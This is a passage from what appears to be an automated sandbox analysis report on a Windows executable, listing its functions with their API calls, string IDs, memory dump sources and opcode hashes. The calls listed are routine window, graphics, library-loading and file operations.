                                                                                                                            • Opcode ID: 134875e674979cd567c136abb418dc525a6250aa5b529fa10794d0eebf3240cc
                                                                                                                            • Instruction ID: 22bb490dc700fc35bbf8fe9eba0271ced42fa0644d0760cf779c582944844a3d
                                                                                                                            • Opcode Fuzzy Hash: 134875e674979cd567c136abb418dc525a6250aa5b529fa10794d0eebf3240cc
                                                                                                                            • Instruction Fuzzy Hash: BA01D4223046103AD6217B755D82E2F26E8DB85B15F50407FF504BB283DA3D9D11937D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0049532C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 47libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(user32.dll), ref: 0049533C
                                                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00495349
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00495356
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                                            • String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
                                                                                                                            • API String ID: 667068680-2254406584
                                                                                                                            • Opcode ID: 5579b8dc187442e7c517f6558358e9e0fd6dcc5405420102cd7b083255a2d8af
                                                                                                                            • Instruction ID: d6622564654ba01390171a2dbbf88ec7785202fdd48675fe733a6c53722864ad
                                                                                                                            • Opcode Fuzzy Hash: 5579b8dc187442e7c517f6558358e9e0fd6dcc5405420102cd7b083255a2d8af
                                                                                                                            • Instruction Fuzzy Hash: 7EF0F692741F156ADA3121660C41B7F6B8CCB917B1F240137BE44A7382E9ED8C0047ED
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0045D688 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 33libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressInit), ref: 0045D691
                                                                                                                            • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompress), ref: 0045D6A1
                                                                                                                            • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressEnd), ref: 0045D6B1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc
                                                                                                                            • String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
                                                                                                                            • API String ID: 190572456-212574377
                                                                                                                            • Opcode ID: 0c00d940adfee3eed657d73ca32928dd6beaef8d72542be6af97d79d08c28db7
                                                                                                                            • Instruction ID: 26f5c6c79611f6cc0facecefa5b4932716cc5d8e9f8ea2477ead0514974f6e87
                                                                                                                            • Opcode Fuzzy Hash: 0c00d940adfee3eed657d73ca32928dd6beaef8d72542be6af97d79d08c28db7
                                                                                                                            • Instruction Fuzzy Hash: 0EF01DB0D00705DFD724EFB6ACC672736D5AB6831AF50813B990E95262D778045ACF2C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0042EA1C Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30libraryloaderwindowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002,00000000,004812C8), ref: 0042EA35
                                                                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EA3B
                                                                                                                            • InterlockedExchange.KERNEL32(0049B668,00000001), ref: 0042EA4C
                                                                                                                              • Part of subcall function 0042E9AC: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA70,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9C2
                                                                                                                              • Part of subcall function 0042E9AC: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C8
                                                                                                                              • Part of subcall function 0042E9AC: InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D9
                                                                                                                            • ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042EA60
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressExchangeHandleInterlockedModuleProc$ChangeFilterMessageWindow
                                                                                                                            • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                                                                                            • API String ID: 142928637-2676053874
                                                                                                                            • Opcode ID: 2e6935975283b392abf6eb535232e6e33c7297ce4864da2c850d0b2669d54df9
                                                                                                                            • Instruction ID: 20967f7a279d57b19857f2ad39d34e10c6be6de8430a8d3efc5b40b14e24a4c3
                                                                                                                            • Opcode Fuzzy Hash: 2e6935975283b392abf6eb535232e6e33c7297ce4864da2c850d0b2669d54df9
                                                                                                                            • Instruction Fuzzy Hash: 99E092A1741B20EAEA10B7B67C86FAA2658EB1076DF500037F100A51F1C3BD1C80CE9E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0044C7DC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 28libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LoadLibraryA.KERNEL32(oleacc.dll,?,0044F089), ref: 0044C7EB
                                                                                                                            • GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C7FC
                                                                                                                            • GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C80C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                                                            • String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
                                                                                                                            • API String ID: 2238633743-1050967733
                                                                                                                            • Opcode ID: 580db4225bb49e0f2395934ae602c4dd6ca827d8c76c18c7318a842ee4a54372
                                                                                                                            • Instruction ID: d6497c9818d993b67a5702c7731996643d684f189bbd4b702b1f6e54e13363b7
                                                                                                                            • Opcode Fuzzy Hash: 580db4225bb49e0f2395934ae602c4dd6ca827d8c76c18c7318a842ee4a54372
                                                                                                                            • Instruction Fuzzy Hash: 50F0DA70282305CAE750BBB5FDD57263694E3A470AF18277BE841551A2C7B94844CB8C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00478C20 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 14libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,00498C24), ref: 00478C26
                                                                                                                            • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478C33
                                                                                                                            • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478C43
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                                            • String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
                                                                                                                            • API String ID: 667068680-222143506
                                                                                                                            • Opcode ID: 81267d710db967c56e7e702a34d1e8b60bf08845a808e06a5f27e56110be3c01
                                                                                                                            • Instruction ID: 32a0137ea675787c0bb1f7a77b9c903aea73f6d33f3aa717a8ad139b0a70eb03
                                                                                                                            • Opcode Fuzzy Hash: 81267d710db967c56e7e702a34d1e8b60bf08845a808e06a5f27e56110be3c01
                                                                                                                            • Instruction Fuzzy Hash: 4DC0C9F02C1700EEAA01B7B11DCAA7A255CC500728320843F7049BA182D97C0C104F3C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041B508 Relevance: 9.1, APIs: 6, Instructions: 113windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetFocus.USER32 ref: 0041B57E
                                                                                                                            • GetDC.USER32(?), ref: 0041B58A
                                                                                                                            • GetDeviceCaps.GDI32(?,00000068), ref: 0041B5A6
                                                                                                                            • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0041B5C3
                                                                                                                            • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0041B5DA
                                                                                                                            • ReleaseDC.USER32(?,?), ref: 0041B626
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EntriesPaletteSystem$CapsDeviceFocusRelease
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2502006586-0
                                                                                                                            • Opcode ID: e956e6ae92597662ed98b2f51c6b506043ab8b509e5ceb21f610fa5f8f95298e
                                                                                                                            • Instruction ID: 1753bd22f5710d4f749a3cf2d8329d0f84e6490acb09e3fae29671003709e3a5
                                                                                                                            • Opcode Fuzzy Hash: e956e6ae92597662ed98b2f51c6b506043ab8b509e5ceb21f610fa5f8f95298e
                                                                                                                            • Instruction Fuzzy Hash: D0410631A04258AFDF10DFA9C885AAFBBB4EF59704F1484AAF500EB351D3389D51CBA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0045D04C Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 73COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetLastError.KERNEL32(00000057,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0B7
                                                                                                                            • SetLastError.KERNEL32(00000000,00000002,?,?,?,0045D184,?,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0F6
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast
                                                                                                                            • String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
                                                                                                                            • API String ID: 1452528299-1580325520
                                                                                                                            • Opcode ID: 44daac30ba6290961f85a10f910adeebe56024b8db7d764ffa7b36a0de599fb3
                                                                                                                            • Instruction ID: 81e1e27ad3ae8d1ea1d6b81b4c13ff0be47bc54c17845d393ef4ad8e2f10c1e8
                                                                                                                            • Opcode Fuzzy Hash: 44daac30ba6290961f85a10f910adeebe56024b8db7d764ffa7b36a0de599fb3
                                                                                                                            • Instruction Fuzzy Hash: 2C117535A04608AFD731DA91C942B9EB6ADDF4470AF6040776D00572C3D67C5F0B992E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041BD8C Relevance: 9.1, APIs: 6, Instructions: 71COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetSystemMetrics.USER32(0000000B), ref: 0041BDD5
                                                                                                                            • GetSystemMetrics.USER32(0000000C), ref: 0041BDDF
                                                                                                                            • GetDC.USER32(00000000), ref: 0041BDE9
                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000E), ref: 0041BE10
                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0041BE1D
                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0041BE56
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CapsDeviceMetricsSystem$Release
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 447804332-0
                                                                                                                            • Opcode ID: 3bdc6123dd6674b0137b7fef1a93c0b96d54f33e4692062cf67464f69f8f60e7
                                                                                                                            • Instruction ID: d5b995c8e3894394b735eabd433659eae54025482fea58e306a85006fdca5b97
                                                                                                                            • Opcode Fuzzy Hash: 3bdc6123dd6674b0137b7fef1a93c0b96d54f33e4692062cf67464f69f8f60e7
                                                                                                                            • Instruction Fuzzy Hash: E5212A74E04648AFEB00EFA9C941BEEB7B4EB48714F10846AF514B7690D7785940CB69
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0047E758 Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetWindowLongA.USER32(?,000000EC), ref: 0047E766
                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0046CD49), ref: 0047E78C
                                                                                                                            • GetWindowLongA.USER32(?,000000EC), ref: 0047E79C
                                                                                                                            • SetWindowLongA.USER32(?,000000EC,00000000), ref: 0047E7BD
                                                                                                                            • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 0047E7D1
                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 0047E7ED
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$Long$Show
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3609083571-0
                                                                                                                            • Opcode ID: ff63fb1e20feffedf8b27b7393a281f73df7108790e31fa3444cbd3f3be65d10
                                                                                                                            • Instruction ID: 463a5c2536fff799c7bf7cf61cbf8045bc8b98cac2b0bb45a0840e8ed8c25010
                                                                                                                            • Opcode Fuzzy Hash: ff63fb1e20feffedf8b27b7393a281f73df7108790e31fa3444cbd3f3be65d10
                                                                                                                            • Instruction Fuzzy Hash: 53010CB5641210ABEA00D769DE81F6637D8AB1C320F0943A6B959DF3E3C738EC408B49
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041B270 Relevance: 9.0, APIs: 6, Instructions: 43COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0041A6E0: CreateBrushIndirect.GDI32 ref: 0041A74B
                                                                                                                            • UnrealizeObject.GDI32(00000000), ref: 0041B27C
                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 0041B28E
                                                                                                                            • SetBkColor.GDI32(?,00000000), ref: 0041B2B1
                                                                                                                            • SetBkMode.GDI32(?,00000002), ref: 0041B2BC
                                                                                                                            • SetBkColor.GDI32(?,00000000), ref: 0041B2D7
                                                                                                                            • SetBkMode.GDI32(?,00000001), ref: 0041B2E2
                                                                                                                              • Part of subcall function 0041A058: GetSysColor.USER32(?), ref: 0041A062
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3527656728-0
                                                                                                                            • Opcode ID: 90af7722afa79acc590a6ee3060039fb524340e2cf7ce152cccbdcb584e8dbde
                                                                                                                            • Instruction ID: d03b18a2b949c207061bd18b8e5d47ed8ce294e6be165222704fda36eef26a4f
                                                                                                                            • Opcode Fuzzy Hash: 90af7722afa79acc590a6ee3060039fb524340e2cf7ce152cccbdcb584e8dbde
                                                                                                                            • Instruction Fuzzy Hash: 56F0CD756015009BDE00FFAAD9CBE4B3B989F043097048496B908DF187CA3CD8649B3A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004538BC Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 100fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539AB
                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539BB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseCreateFileHandle
                                                                                                                            • String ID: !nI$.tmp$_iu
                                                                                                                            • API String ID: 3498533004-584216493
                                                                                                                            • Opcode ID: 1dee75e2bfc2da78c26475f080e8b0a4db6a1a73d39b0bf1d20dabbe4352c150
                                                                                                                            • Instruction ID: 7da7e9bbb2667b7856572ae533a3071efe8e017fb0344d9459fa270775feb22d
                                                                                                                            • Opcode Fuzzy Hash: 1dee75e2bfc2da78c26475f080e8b0a4db6a1a73d39b0bf1d20dabbe4352c150
                                                                                                                            • Instruction Fuzzy Hash: 1831C5B0A00249ABCB11EF95D842B9EBBB4AF44345F20453AF810B73C2D7785F058B69
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00497D5C Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 97COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                                                            • ShowWindow.USER32(?,00000005,00000000,00497FC1,?,?,00000000), ref: 00497D92
                                                                                                                              • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                                                              • Part of subcall function 004072A8: SetCurrentDirectoryA.KERNEL32(00000000,?,00497DBA,00000000,00497F8D,?,?,00000005,00000000,00497FC1,?,?,00000000), ref: 004072B3
                                                                                                                              • Part of subcall function 0042D44C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4DA,?,?,?,00000001,?,0045607E,00000000,004560E6), ref: 0042D481
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                                                                                            • String ID: .dat$.msg$IMsg$Uninstall
                                                                                                                            • API String ID: 3312786188-1660910688
                                                                                                                            • Opcode ID: f79b411802c9da3a9116882e1755ce4b3781acbc659f3f1c23c36e526850363e
                                                                                                                            • Instruction ID: abb28459e614be91aca1b68aa70fad33032f6e559e3bf784a216f74f74fa669e
                                                                                                                            • Opcode Fuzzy Hash: f79b411802c9da3a9116882e1755ce4b3781acbc659f3f1c23c36e526850363e
                                                                                                                            • Instruction Fuzzy Hash: 89314F34A14114AFCB00EF65DD9296E7BB5EF89314F91857AF800AB395DB38BD01CB68
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0042EAA8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042EADA
                                                                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EAE0
